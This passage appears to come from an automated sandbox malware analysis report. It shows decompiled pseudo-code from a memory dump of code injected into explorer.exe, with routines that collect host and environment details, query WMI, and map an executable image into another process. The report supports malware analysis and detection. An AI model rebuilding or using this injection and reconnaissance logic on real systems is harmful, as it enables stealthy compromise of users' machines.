                                          				char* _t169;
                                          				intOrPtr _t181;
                                          				intOrPtr _t200;
                                          				void* _t215;
                                          				char _t218;
                                          				void* _t219;
                                          				char* _t220;
                                          				struct _OSVERSIONINFOA* _t222;
                                          				void* _t223;
                                          				int* _t224;
                                          				void* _t241;
                                          
                                          				_t241 = __fp0;
                                          				_t162 =  *0x9e69c; // 0x10000000
                                          				_t81 = E00088604(0x1ac4);
                                          				_t222 = _t81;
                                          				if(_t222 == 0) {
                                          					return _t81;
                                          				}
                                          				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                                          				_t83 =  *0x9e684; // 0x34f8f0
                                          				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                                          				_t3 = _t222 + 0x648; // 0x648
                                          				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                                          				_t5 = _t222 + 0x1644; // 0x1644
                                          				_t216 = _t5;
                                          				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                                          				_t227 = _t86;
                                          				if(_t86 != 0) {
                                          					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
                                          				}
                                          				GetCurrentProcess();
                                          				_t88 = E0008BA05();
                                          				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                                          				_t178 =  *_t88;
                                          				if(E0008BB8D( *_t88) == 0) {
                                          					_t90 = E0008BA62(_t178, _t222);
                                          					__eflags = _t90;
                                          					_t181 = (0 | _t90 > 0x00000000) + 1;
                                          					__eflags = _t181;
                                          					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                                          				} else {
                                          					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                                          				}
                                          				_t12 = _t222 + 0x220; // 0x220
                                          				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
                                          				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
                                          				_push( &_v16);
                                          				 *(_t222 + 0x224) = _t162;
                                          				_push( &_v8);
                                          				_v12 = 0x80;
                                          				_push( &_v692);
                                          				_v8 = 0x100;
                                          				_push( &_v12);
                                          				_t22 = _t222 + 0x114; // 0x114
                                          				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                                          				_t95 =  *0x9e68c; // 0x34fab8
                                          				_push(0);
                                          				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
                                          					GetLastError();
                                          				}
                                          				_t97 =  *0x9e694; // 0x34fa48
                                          				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                                          				_t26 = _t222 + 0x228; // 0x228
                                          				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                                          				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                                          				GetLastError();
                                          				_t31 = _t222 + 0x228; // 0x228
                                          				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
                                          				_t34 = _t222 + 0x114; // 0x114
                                          				_t103 = E0008B7A8(_t34,  &_v692);
                                          				_t35 = _t222 + 0xb0; // 0xb0
                                          				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                                          				_push(_t35);
                                          				E0008B67D(_t103, _t35, _t98, _t241);
                                          				_t37 = _t222 + 0xb0; // 0xb0
                                          				_t105 = _t37;
                                          				_t38 = _t222 + 0xd0; // 0xd0
                                          				_t164 = _t38;
                                          				if(_t105 != 0) {
                                          					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                                          					if(_t159 > 0) {
                                          						_t164[_t159] = 0;
                                          					}
                                          				}
                                          				_t41 = _t222 + 0x438; // 0x438
                                          				_t42 = _t222 + 0x228; // 0x228
                                          				E00088FD8(_t42, _t41);
                                          				_t43 = _t222 + 0xb0; // 0xb0
                                          				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
                                          				_t44 = _t222 + 0x100c; // 0x100c
                                          				E0008B88A(_t108, _t44, _t241);
                                          				_t199 = GetCurrentProcess();
                                          				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
                                          				memset(_t222, 0, 0x9c);
                                          				_t224 = _t223 + 0xc;
                                          				_t222->dwOSVersionInfoSize = 0x9c;
                                          				GetVersionExA(_t222);
                                          				_t167 =  *0x9e684; // 0x34f8f0
                                          				_t115 = 0;
                                          				_v8 = 0;
                                          				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                                          					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                                          					_t115 = _v8;
                                          				}
                                          				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                                          				if(_t115 == 0) {
                                          					GetSystemInfo( &_v52);
                                          					_t117 = _v52.dwOemId & 0x0000ffff;
                                          				} else {
                                          					_t117 = 9;
                                          				}
                                          				_t54 = _t222 + 0x1020; // 0x1020
                                          				_t168 = _t54;
                                          				 *(_t222 + 0x9c) = _t117;
                                          				GetWindowsDirectoryW(_t168, 0x104);
                                          				_t119 = E000895E1(_t199, 0x10c);
                                          				_t200 =  *0x9e684; // 0x34f8f0
                                          				_t218 = _t119;
                                          				 *_t224 = 0x104;
                                          				_push( &_v704);
                                          				_push(_t218);
                                          				_v8 = _t218;
                                          				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                                          					_t154 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                                          				}
                                          				E000885D5( &_v8);
                                          				_t124 =  *0x9e684; // 0x34f8f0
                                          				_t61 = _t222 + 0x1434; // 0x1434
                                          				_t219 = _t61;
                                          				 *_t224 = 0x209;
                                          				_push(_t219);
                                          				_push(L"USERPROFILE");
                                          				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                          					E00089640(_t219, 0x105, L"%s\\%s", _t168);
                                          					_t152 =  *0x9e684; // 0x34f8f0
                                          					_t224 =  &(_t224[5]);
                                          					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                          				}
                                          				_push(0x20a);
                                          				_t64 = _t222 + 0x122a; // 0x122a
                                          				_t169 = L"TEMP";
                                          				_t127 =  *0x9e684; // 0x34f8f0
                                          				_push(_t169);
                                          				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                          					_t149 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                          				}
                                          				_push(0x40);
                                          				_t220 = L"SystemDrive";
                                          				_push( &_v180);
                                          				_t130 =  *0x9e684; // 0x34f8f0
                                          				_push(_t220);
                                          				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                          					_t147 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                          				}
                                          				_v8 = 0x7f;
                                          				_t72 = _t222 + 0x199c; // 0x199c
                                          				_t134 =  *0x9e684; // 0x34f8f0
                                          				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                          				_t75 = _t222 + 0x100c; // 0x100c
                                          				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
                                          				_t76 = _t222 + 0x1858; // 0x1858
                                          				E000922D3( &_v2680, _t76, 0x20);
                                          				_t79 = _t222 + 0x1878; // 0x1878
                                          				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
                                          				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
                                          				return _t222;
                                          			}

                                          0x0008d223
                                          0x0008d229
                                          0x0008d22e
                                          0x0008d231
                                          0x0008d234
                                          0x0008d23a
                                          0x0008d240
                                          0x0008d242
                                          0x0008d248
                                          0x0008d251
                                          0x0008d254
                                          0x0008d254
                                          0x0008d257
                                          0x0008d25f
                                          0x0008d26a
                                          0x0008d270
                                          0x0008d261
                                          0x0008d263
                                          0x0008d263
                                          0x0008d279
                                          0x0008d279
                                          0x0008d27f
                                          0x0008d287
                                          0x0008d292
                                          0x0008d297
                                          0x0008d29d
                                          0x0008d29f
                                          0x0008d2ac
                                          0x0008d2ad
                                          0x0008d2ae
                                          0x0008d2b9
                                          0x0008d2bb
                                          0x0008d2c2
                                          0x0008d2c2
                                          0x0008d2cc
                                          0x0008d2d1
                                          0x0008d2d6
                                          0x0008d2d6
                                          0x0008d2dc
                                          0x0008d2e3
                                          0x0008d2e4
                                          0x0008d2f1
                                          0x0008d304
                                          0x0008d309
                                          0x0008d30e
                                          0x0008d317
                                          0x0008d317
                                          0x0008d31d
                                          0x0008d322
                                          0x0008d328
                                          0x0008d32e
                                          0x0008d333
                                          0x0008d33c
                                          0x0008d33e
                                          0x0008d345
                                          0x0008d345
                                          0x0008d34b
                                          0x0008d353
                                          0x0008d358
                                          0x0008d359
                                          0x0008d35e
                                          0x0008d367
                                          0x0008d369
                                          0x0008d374
                                          0x0008d374
                                          0x0008d37d
                                          0x0008d385
                                          0x0008d38c
                                          0x0008d391
                                          0x0008d3a0
                                          0x0008d3b8
                                          0x0008d3bf
                                          0x0008d3cd
                                          0x0008d3df
                                          0x0008d3e6
                                          0x0008d3f3
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • GetCurrentProcessId.KERNEL32 ref: 0008D046
                                          • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                                          • GetCurrentProcess.KERNEL32 ref: 0008D09F
                                          • GetLastError.KERNEL32 ref: 0008D13E
                                          • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                                          • GetLastError.KERNEL32 ref: 0008D172
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                                          • GetCurrentProcess.KERNEL32 ref: 0008D20E
                                          • memset.MSVCRT ref: 0008D229
                                          • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                                          • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                                          • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                                          • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                                          • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                          • API String ID: 3876402152-2706916422
                                          • Opcode ID: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
                                          • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                                          • Opcode Fuzzy Hash: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
                                          • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				void* _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				char _v48;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				signed int _v60;
                                          				char* _v72;
                                          				signed short _v80;
                                          				signed int _v84;
                                          				char _v88;
                                          				char _v92;
                                          				char _v96;
                                          				intOrPtr _v100;
                                          				char _v104;
                                          				char _v616;
                                          				intOrPtr* _t159;
                                          				char _t165;
                                          				signed int _t166;
                                          				signed int _t173;
                                          				signed int _t178;
                                          				signed int _t186;
                                          				intOrPtr* _t187;
                                          				signed int _t188;
                                          				signed int _t192;
                                          				intOrPtr* _t193;
                                          				intOrPtr _t200;
                                          				intOrPtr* _t205;
                                          				signed int _t207;
                                          				signed int _t209;
                                          				intOrPtr* _t210;
                                          				intOrPtr _t212;
                                          				intOrPtr* _t213;
                                          				signed int _t214;
                                          				char _t217;
                                          				signed int _t218;
                                          				signed int _t219;
                                          				signed int _t230;
                                          				signed int _t235;
                                          				signed int _t242;
                                          				signed int _t243;
                                          				signed int _t244;
                                          				signed int _t245;
                                          				intOrPtr* _t247;
                                          				intOrPtr* _t251;
                                          				signed int _t252;
                                          				intOrPtr* _t253;
                                          				void* _t255;
                                          				intOrPtr* _t261;
                                          				signed int _t262;
                                          				signed int _t283;
                                          				signed int _t289;
                                          				char* _t298;
                                          				void* _t320;
                                          				signed int _t322;
                                          				intOrPtr* _t323;
                                          				intOrPtr _t324;
                                          				signed int _t327;
                                          				intOrPtr* _t328;
                                          				intOrPtr* _t329;
                                          
                                          				_v32 = _v32 & 0x00000000;
                                          				_v60 = _v60 & 0x00000000;
                                          				_v56 = __edx;
                                          				_v100 = __ecx;
                                          				_t159 = E0008D523(__ecx);
                                          				_t251 = _t159;
                                          				_v104 = _t251;
                                          				if(_t251 == 0) {
                                          					return _t159;
                                          				}
                                          				_t320 = E00088604(0x10);
                                          				_v36 = _t320;
                                          				_pop(_t255);
                                          				if(_t320 == 0) {
                                          					L53:
                                          					E0008861A( &_v60, 0xfffffffe);
                                          					E0008D5D7( &_v104);
                                          					return _t320;
                                          				}
                                          				_t165 = E000895E1(_t255, 0x536);
                                          				 *_t328 = 0x609;
                                          				_v52 = _t165;
                                          				_t166 = E000895E1(_t255);
                                          				_push(0);
                                          				_push(_v56);
                                          				_v20 = _t166;
                                          				_push(_t166);
                                          				_push(_a4);
                                          				_t322 = E000892E5(_t165);
                                          				_v60 = _t322;
                                          				E000885D5( &_v52);
                                          				E000885D5( &_v20);
                                          				_t329 = _t328 + 0x20;
                                          				if(_t322 != 0) {
                                          					_t323 = __imp__#2;
                                          					_v40 =  *_t323(_t322);
                                          					_t173 = E000895E1(_t255, 0x9e4);
                                          					_v20 = _t173;
                                          					_v52 =  *_t323(_t173);
                                          					E000885D5( &_v20);
                                          					_t324 = _v40;
                                          					_t261 =  *_t251;
                                          					_t252 = 0;
                                          					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                          					__eflags = _t178;
                                          					if(_t178 != 0) {
                                          						L52:
                                          						__imp__#6(_t324);
                                          						__imp__#6(_v52);
                                          						goto L53;
                                          					}
                                          					_t262 = _v32;
                                          					_v28 = 0;
                                          					_v20 = 0;
                                          					__eflags = _t262;
                                          					if(_t262 == 0) {
                                          						L49:
                                          						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                          						__eflags = _t252;
                                          						if(_t252 == 0) {
                                          							E0008861A( &_v36, 0);
                                          							_t320 = _v36;
                                          						} else {
                                          							 *(_t320 + 8) = _t252;
                                          							 *_t320 = E000891E3(_v100);
                                          							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
                                          						}
                                          						goto L52;
                                          					} else {
                                          						goto L6;
                                          					}
                                          					while(1) {
                                          						L6:
                                          						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                          						__eflags = _t186;
                                          						if(_t186 != 0) {
                                          							break;
                                          						}
                                          						_v16 = 0;
                                          						_v48 = 0;
                                          						_v12 = 0;
                                          						_v24 = 0;
                                          						__eflags = _v84;
                                          						if(_v84 == 0) {
                                          							break;
                                          						}
                                          						_t187 = _v28;
                                          						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                          						__eflags = _t188;
                                          						if(_t188 >= 0) {
                                          							__imp__#20(_v24, 1,  &_v16);
                                          							__imp__#19(_v24, 1,  &_v48);
                                          							_t46 = _t320 + 0xc; // 0xc
                                          							_t253 = _t46;
                                          							_t327 = _t252 << 3;
                                          							_t47 = _t327 + 8; // 0x8
                                          							_t192 = E00088698(_t327, _t47);
                                          							__eflags = _t192;
                                          							if(_t192 == 0) {
                                          								__imp__#16(_v24);
                                          								_t193 = _v28;
                                          								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                          								L46:
                                          								_t252 = _v20;
                                          								break;
                                          							}
                                          							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                          							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
                                          							_t200 =  *_t253;
                                          							__eflags =  *(_t327 + _t200 + 4);
                                          							if( *(_t327 + _t200 + 4) == 0) {
                                          								_t136 = _t320 + 0xc; // 0xc
                                          								E0008861A(_t136, 0);
                                          								E0008861A( &_v36, 0);
                                          								__imp__#16(_v24);
                                          								_t205 = _v28;
                                          								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                          								_t320 = _v36;
                                          								goto L46;
                                          							}
                                          							_t207 = _v16;
                                          							while(1) {
                                          								_v12 = _t207;
                                          								__eflags = _t207 - _v48;
                                          								if(_t207 > _v48) {
                                          									break;
                                          								}
                                          								_v44 = _v44 & 0x00000000;
                                          								_t209 =  &_v12;
                                          								__imp__#25(_v24, _t209,  &_v44);
                                          								__eflags = _t209;
                                          								if(_t209 < 0) {
                                          									break;
                                          								}
                                          								_t212 = E000891E3(_v44);
                                          								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                          								_t213 = _v28;
                                          								_t281 =  *_t213;
                                          								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                          								__eflags = _t214;
                                          								if(_t214 < 0) {
                                          									L39:
                                          									__imp__#6(_v44);
                                          									_t207 = _v12 + 1;
                                          									__eflags = _t207;
                                          									continue;
                                          								}
                                          								_v92 = E000895E1(_t281, 0x250);
                                          								 *_t329 = 0x4cc;
                                          								_t217 = E000895E1(_t281);
                                          								_t283 = _v80;
                                          								_v96 = _t217;
                                          								_t218 = _t283 & 0x0000ffff;
                                          								__eflags = _t218 - 0xb;
                                          								if(__eflags > 0) {
                                          									_t219 = _t218 - 0x10;
                                          									__eflags = _t219;
                                          									if(_t219 == 0) {
                                          										L35:
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                          										__eflags = _t289;
                                          										if(_t289 == 0) {
                                          											L38:
                                          											E000885D5( &_v92);
                                          											E000885D5( &_v96);
                                          											__imp__#9( &_v80);
                                          											goto L39;
                                          										}
                                          										_push(_v72);
                                          										_push(L"%d");
                                          										L37:
                                          										_push(0xc);
                                          										_push(_t289);
                                          										E00089640();
                                          										_t329 = _t329 + 0x10;
                                          										goto L38;
                                          									}
                                          									_t230 = _t219 - 1;
                                          									__eflags = _t230;
                                          									if(_t230 == 0) {
                                          										L33:
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                          										__eflags = _t289;
                                          										if(_t289 == 0) {
                                          											goto L38;
                                          										}
                                          										_push(_v72);
                                          										_push(L"%u");
                                          										goto L37;
                                          									}
                                          									_t235 = _t230 - 1;
                                          									__eflags = _t235;
                                          									if(_t235 == 0) {
                                          										goto L33;
                                          									}
                                          									__eflags = _t235 == 1;
                                          									if(_t235 == 1) {
                                          										goto L33;
                                          									}
                                          									L28:
                                          									__eflags = _t283 & 0x00002000;
                                          									if((_t283 & 0x00002000) == 0) {
                                          										_v88 = E000895E1(_t283, 0x219);
                                          										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                          										E000885D5( &_v88);
                                          										_t329 = _t329 + 0x18;
                                          										_t298 =  &_v616;
                                          										L31:
                                          										_t242 = E000891E3(_t298);
                                          										L32:
                                          										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                          										goto L38;
                                          									}
                                          									_t242 = E0008DA20( &_v80);
                                          									goto L32;
                                          								}
                                          								if(__eflags == 0) {
                                          									__eflags = _v72 - 0xffff;
                                          									_t298 = L"TRUE";
                                          									if(_v72 != 0xffff) {
                                          										_t298 = L"FALSE";
                                          									}
                                          									goto L31;
                                          								}
                                          								_t243 = _t218 - 1;
                                          								__eflags = _t243;
                                          								if(_t243 == 0) {
                                          									goto L38;
                                          								}
                                          								_t244 = _t243 - 1;
                                          								__eflags = _t244;
                                          								if(_t244 == 0) {
                                          									goto L35;
                                          								}
                                          								_t245 = _t244 - 1;
                                          								__eflags = _t245;
                                          								if(_t245 == 0) {
                                          									goto L35;
                                          								}
                                          								__eflags = _t245 != 5;
                                          								if(_t245 != 5) {
                                          									goto L28;
                                          								}
                                          								_t298 = _v72;
                                          								goto L31;
                                          							}
                                          							__imp__#16(_v24);
                                          							_t210 = _v28;
                                          							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                          							_t252 = _v20;
                                          							L42:
                                          							_t262 = _v32;
                                          							_t252 = _t252 + 1;
                                          							_v20 = _t252;
                                          							__eflags = _t262;
                                          							if(_t262 != 0) {
                                          								continue;
                                          							}
                                          							L48:
                                          							_t324 = _v40;
                                          							goto L49;
                                          						}
                                          						_t247 = _v28;
                                          						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                          						goto L42;
                                          					}
                                          					_t262 = _v32;
                                          					goto L48;
                                          				} else {
                                          					E0008861A( &_v36, _t322);
                                          					_t320 = _v36;
                                          					goto L53;
                                          				}
                                          			}


                                          APIs
                                            • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                                            • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                                            • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                                            • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                                            • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                                          • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                                          • SysFreeString.OLEAUT32(?), ref: 0008DF82
                                          • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                                            • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                          • String ID: FALSE$TRUE
                                          • API String ID: 1290676130-1412513891
                                          • Opcode ID: 14469509326b1245f60a3822b604f0d2155a7e129896877e627dd39ddefd1d86
                                          • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                                          • Opcode Fuzzy Hash: 14469509326b1245f60a3822b604f0d2155a7e129896877e627dd39ddefd1d86
                                          • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				char _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				intOrPtr _v36;
                                          				struct HINSTANCE__* _v40;
                                          				char _v44;
                                          				char _v56;
                                          				char _v72;
                                          				struct _WNDCLASSEXA _v120;
                                          				intOrPtr _t69;
                                          				intOrPtr _t71;
                                          				intOrPtr _t75;
                                          				intOrPtr _t80;
                                          				intOrPtr _t92;
                                          				intOrPtr _t95;
                                          				intOrPtr _t96;
                                          				struct HWND__* _t106;
                                          				intOrPtr* _t113;
                                          				struct HINSTANCE__* _t116;
                                          				intOrPtr _t120;
                                          				intOrPtr _t126;
                                          				intOrPtr _t131;
                                          				intOrPtr _t134;
                                          				intOrPtr _t136;
                                          				intOrPtr _t139;
                                          				char _t140;
                                          				intOrPtr _t141;
                                          
                                          				_t69 =  *0x9e688; // 0xb0000
                                          				_t126 = __ecx;
                                          				_t134 = __edx;
                                          				_t116 = 0;
                                          				_v36 = __edx;
                                          				_v16 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				_v24 = 0;
                                          				_v20 = __ecx;
                                          				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                          					E0008E23E(0x1f4);
                                          					_t116 = 0;
                                          				}
                                          				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                          				_v28 = _t116;
                                          				if( *_t113 != 0x4550) {
                                          					L12:
                                          					if(_v8 != 0) {
                                          						_t75 =  *0x9e780; // 0x0
                                          						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                          						_v8 = _v8 & 0x00000000;
                                          					}
                                          					L14:
                                          					if(_v12 != 0) {
                                          						_t136 =  *0x9e780; // 0x0
                                          						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                                          					}
                                          					if(_v16 != 0) {
                                          						_t71 =  *0x9e780; // 0x0
                                          						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                                          					}
                                          					return _v8;
                                          				}
                                          				_push(_t116);
                                          				_push(0x8000000);
                                          				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                          				_push(0x40);
                                          				_push( &_v44);
                                          				_push(_t116);
                                          				_push(0xe);
                                          				_push( &_v16);
                                          				_t80 =  *0x9e780; // 0x0
                                          				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                                          					goto L12;
                                          				}
                                          				_v120.style = 0xb;
                                          				_v120.cbSize = 0x30;
                                          				_v120.lpszClassName =  &_v56;
                                          				asm("movsd");
                                          				_v120.lpfnWndProc = DefWindowProcA;
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsb");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsw");
                                          				asm("movsb");
                                          				_v120.cbWndExtra = 0;
                                          				_v120.lpszMenuName = 0;
                                          				_v120.cbClsExtra = 0;
                                          				_v120.hInstance = 0;
                                          				if(RegisterClassExA( &_v120) != 0) {
                                          					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                                          					if(_t106 != 0) {
                                          						DestroyWindow(_t106);
                                          						UnregisterClassA( &_v56, 0);
                                          					}
                                          				}
                                          				_t139 =  *0x9e780; // 0x0
                                          				_push(0x40);
                                          				_push(0);
                                          				_push(2);
                                          				_push( &_v24);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v12);
                                          				_push(GetCurrentProcess());
                                          				_push(_v16);
                                          				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                                          					_t126 = _v20;
                                          					goto L12;
                                          				} else {
                                          					_push(0x40);
                                          					_push(0);
                                          					_push(2);
                                          					_push( &_v24);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t126 = _v20;
                                          					_push( &_v8);
                                          					_t92 =  *0x9e780; // 0x0
                                          					_push(_t126);
                                          					_push(_v16);
                                          					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                                          						goto L12;
                                          					}
                                          					_t140 = E00088669( *0x9e688, 0x1ac4);
                                          					_v32 = _t140;
                                          					if(_t140 == 0) {
                                          						goto L12;
                                          					}
                                          					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                          					_t95 =  *0x9e684; // 0x34f8f0
                                          					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                                          					_t120 =  *0x9e684; // 0x34f8f0
                                          					_t131 = _t96;
                                          					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                          					E0008861A( &_v32, 0x1ac4);
                                          					_t141 =  *0x9e688; // 0xb0000
                                          					 *0x9e688 = _t131;
                                          					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                          					E0008C63F(_v12, _v8, _v36);
                                          					 *0x9e688 = _t141;
                                          					goto L14;
                                          				}
                                          			}

                                          APIs
                                          • RegisterClassExA.USER32 ref: 0008C785
                                          • CreateWindowExA.USER32 ref: 0008C7B0
                                          • DestroyWindow.USER32 ref: 0008C7BB
                                          • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                                          • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                                            • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
